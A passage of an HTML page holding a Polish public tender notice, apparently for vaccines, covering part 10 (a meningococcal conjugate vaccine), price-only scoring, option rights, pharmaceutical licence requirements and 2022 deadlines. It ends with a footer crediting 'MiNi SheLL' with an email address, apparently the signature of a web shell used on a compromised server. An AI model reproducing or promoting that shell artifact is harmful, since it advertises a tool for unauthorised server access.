spośród tych ofert wybiera ofertę z niższą ceną lub najniższym kosztem, a jeżeli zostały złożone<br/>oferty o takiej samej cenie lub koszcie, zamawiający wzywa wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym<br/>przez zamawiającego ofert dodatkowych.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 10</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Szczepionka skoniugowana przeciwko meningokokom grupy A,C,W 135,Y dla dzieci powyżej 2 miesiąca życia. Liczba sztuk<br/>zamawianych na okres zamówienia: 50 szt. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33651600-4 - Szczepionki</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 15) Zgodnie z art. 441 pzp Zamawiający przewiduje możliwość zlecenia Wykonawcy dodatkowego zakresu rzeczowego<br/>(„Opcja”) dla każdej części, w przypadku, gdy w okresie trwania umowy wyczerpaniu ulegnie zakres podstawowy a zakup<br/>dodatkowej ilości szczepionek będzie leżał w interesie Zamawiającego oraz wynikał z jego bieżących potrzeb.<br/>16) Asortyment będący przedmiotem Opcji może zostać zamówiony w ilości stanowiącej równowartość do 30% wartości<br/>zamówienia podstawowego (dla każdej części), określonej w umowie zawartej z Wykonawcą. Podstawą określenia wartości<br/>zamówienia w ramach Opcji (w celu określenia jej zakresu) będą ceny jednostkowe poszczególnych asortymentów zawarte<br/>w ofercie Wykonawcy.<br/>17) W celu uruchomienia prawa opcji Zamawiający złoży Wykonawcy pisemne oświadczenie woli w przedmiocie<br/>skorzystania z prawa opcji w określonym zakresie. Oświadczenie będzie zawierało potwierdzenie środków finansowych na<br/>zrealizowanie zamówienia i będzie stanowiło załącznik do umowy.<br/>18) Prawo opcji jest jednostronnym uprawnieniem Zamawiającego, z którego może, ale nie ma obowiązku skorzystać w<br/>ramach realizacji przedmiotu zamówienia. W przypadku nie skorzystania przez Zamawiającego z prawa opcji Wykonawcy<br/>nie przysługują żadne roszczenia z tego tytułu.<br/>19) Jeżeli Zamawiający skorzysta z prawa opcji obowiązkiem umownym wykonawcy jest wykonanie świadczenia w zakresie<br/>objętym wykorzystanym prawem opcji na warunkach takich jak zamówienie podstawowe<br/>20) Zamawiający ma prawo wielokrotnie korzystać z prawa opcji po zrealizowaniu zakresu podstawowego zamówienia –<br/>jednak do wyczerpania maksymalnego zakresu prawa opcji.<br/>21) Uruchomienie opcji nie będzie wymagało zmiany umowy. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">16. Opis kryteriów oceny ofert, wraz z podaniem wag tych kryteriów i sposobu oceny ofert:<br/>1. Zamawiający przy wyborze najkorzystniejszej oferty będzie kierować się kryterium oceny ofert: Cena – 100%;<br/>2. Ocena ofert zostanie dokonana w następujący sposób:<br/>Kryterium ceny rozpatrywane będzie na podstawie ceny brutto podanej przez Wykonawcę. Wykonawca, który przedstawi najniższą<br/>cenę w ofercie otrzyma max 100 pkt., a inni odpowiednio mniej, stosownie do przedstawionego poniżej wzoru:<br/>C = (Cmin : Cx) x 100<br/>gdzie:<br/>C – liczba punktów przyznanych danej ofercie,<br/>Przyznane punkty zostaną zaokrąglone do dwóch miejsc po przecinku.<br/>Cmin – najniższa cena brutto zaoferowana w przetargu,<br/>Cx– cena brutto podana przez Wykonawcę, dla którego wynik jest obliczany.<br/>Jeżeli nie można wybrać oferty najkorzystniejszej z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych<br/>kryteriów oceny ofert, Zamawiający spośród tych ofert wybiera ofertę z niższą ceną lub najniższym kosztem, a jeżeli zostały złożone<br/>oferty o takiej samej cenie lub koszcie, zamawiający wzywa wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym<br/>przez zamawiającego ofert dodatkowych.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 13.1 O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki udziału w postępowaniu, dotyczące:<br/>13.1.2 uprawnień do prowadzenia określnej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych<br/>przepisów:<br/>O udzielenie przedmiotowego zamówienia publicznego – (dotyczy każdego zadania) może ubiegać się Wykonawca, który<br/>posiada ważne, aktualne zezwolenie na wytwarzanie lub import produktu leczniczego (w przypadku Wykonawcy mającego<br/>siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej – dokument równoważny) lub ważne<br/>zezwolenie na prowadzenie hurtowni farmaceutycznych. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">12. Podstawy wykluczenia, o których mowa w art. 108 ust. 1 Pzp.<br/>Nie może podlegać wykluczeniu z postępowania na podstawie żadnej z przesłanek, o których mowa w art. 108 ust. 1 Pzp:<br/>wykonawca, żaden ze wspólników spółki cywilnej, konsorcjantów, podmiotów występujących wspólnie (w przypadku składania oferty<br/>wspólnej), ani żaden podmiot, na którego zasoby powołuje się Wykonawca w celu spełnienia warunków udziału w postępowaniu.<br/>Nie może podlegać wykluczeniu z postępowania na podstawie żadnej z przesłanek określonych w art. 7 ust. 1 ustawy o<br/>szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa<br/>narodowego (Dz. U. z 2022 r., poz. 835) wykonawca, żaden ze wspólników spółki cywilnej, konsorcjantów, podmiotów<br/>występujących wspólnie (w przypadku składania oferty wspólnej), ani żaden podmiot, na którego zasoby powołuje się Wykonawca w<br/>celu spełnienia warunków udziału w postępowaniu.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Na wezwanie Zamawiającego, na podstawie art. 274 ust.1 ustawy Pzp., Wykonawca, którego oferta została najwyżej oceniona będzie<br/>zobowiązany do złożenia podmiotowych środków dowodowych w celu potwierdzenia spełniania przez wykonawcę warunków<br/>udziału w postępowaniu dotyczących uprawnień do prowadzenia określnej działalności gospodarczej lub zawodowej, o ile wynika to<br/>z odrębnych przepisów, tj. aktualnej koncesji, zezwolenia, licencji lub dokumentu potwierdzającego, że wykonawca jest wpisany do<br/>rejestru działalności regulowanej prowadzonym w państwie członkowskim Unii Europejskiej, w którym wykonawca ma siedzibę lub<br/>miejsce zamieszkania, tj. posiadanie ważnego, aktualnego zezwolenie na wytwarzanie lub import produktu leczniczego (w<br/>przypadku Wykonawcy mającego siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej – dokument<br/>równoważny) lub ważne zezwolenie na prowadzenie hurtowni farmaceutycznych.<br/>Podmiotowe środki dowodowe (wymienione w niniejszym punkcie nr 13 SWZ) należy złożyć na wezwanie Zamawiającego w terminie<br/>przez niego wskazanym i w formie określonej w Rozporządzeniu Ministra Rozwoju, Pracy i Technologii z 23.12.2020 r. w sprawie<br/>podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy (Dz.<br/>U. z 2020 r. poz. 2415) oraz zgodnie z Rozporządzeniem Prezesa Rozporządzenie Rady Ministrów z dnia 30.12.2020r. w sprawie<br/>sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków<br/>komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie” (Dz.U. z 2020 r. poz. 2452).</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 10. Zasady udziału w postępowaniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego.<br/>1) Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W tym przypadku Wykonawcy ustanawiają<br/>pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i<br/>zawarcia umowy w sprawie zamówienia publicznego.<br/>2) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ponoszą solidarną odpowiedzialność za wykonanie<br/>umowy.<br/>4) Każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia musi wykazać, iż brak jest podstaw do jego<br/>wykluczenia z postępowania w okolicznościach, o których mowa w art. 108 ust.1 ustawy Pzp.<br/>5) Jeżeli oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia, zostanie wybrana, Zamawiający żąda<br/>przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych Wykonawców.<br/>6) Wszelka korespondencja prowadzona będzie wyłącznie z podmiotem występującym jako pełnomocnik Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy został określony w paragrafie 8 załącznika nr 4 do SWZ -projektowane postanowienia<br/>umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-07-20 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">1)	Zgodnie z art. 63 ust. 2 Pzp ofertę wraz z załącznikami, o których mowa w punkcie nr 9. SWZ należy złożyć, pod rygorem nieważności, w formie elektronicznej (podpisana kwalifikowanym podpisem elektronicznym) lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-07-20 10:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-08-18</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: </h3> <p class="mb-0">Część 1 : <span class="normal">Tak</span></p> <p class="mb-0">Część 2 : <span class="normal">Tak</span></p> <p class="mb-0">Część 3 : <span class="normal">Tak</span></p> <p class="mb-0">Część 4 : <span class="normal">Tak</span></p> <p class="mb-0">Część 5 : <span class="normal">Tak</span></p> <p class="mb-0">Część 6 : <span class="normal">Tak</span></p> <p class="mb-0">Część 7 : <span class="normal">Tak</span></p> <p class="mb-0">Część 8 : <span class="normal">Tak</span></p> <p class="mb-0">Część 9 : <span class="normal">Tak</span></p> <p class="mb-0">Część 10 : <span class="normal">Tak</span></p>

Creat By MiNi SheLL
Email: jattceo@gmail.com